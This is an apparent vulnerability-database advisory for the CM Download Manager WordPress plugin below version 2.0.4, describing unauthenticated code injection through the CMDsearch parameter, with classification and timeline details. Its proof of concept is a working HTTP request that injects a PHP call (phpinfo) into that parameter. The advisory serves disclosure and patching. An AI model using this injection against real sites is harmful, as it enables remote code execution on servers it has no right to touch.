WordPress Plugin Vulnerabilities
CM Download Manager < 2.0.4 - Unauthenticated Code Injection
Description
The plugin does not validate and sanitise the CMDsearch parameter which used to create a custom function. This allows attacker to run arbitrary command on the remote server
Proof of Concept
GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive
Affects Plugins
References
Classification
Type
RCE
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
ethicalhack3r
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2014-11-20 (about 9 years ago)
Added
2014-11-20 (about 9 years ago)
Last Updated
2020-10-22 (about 3 years ago)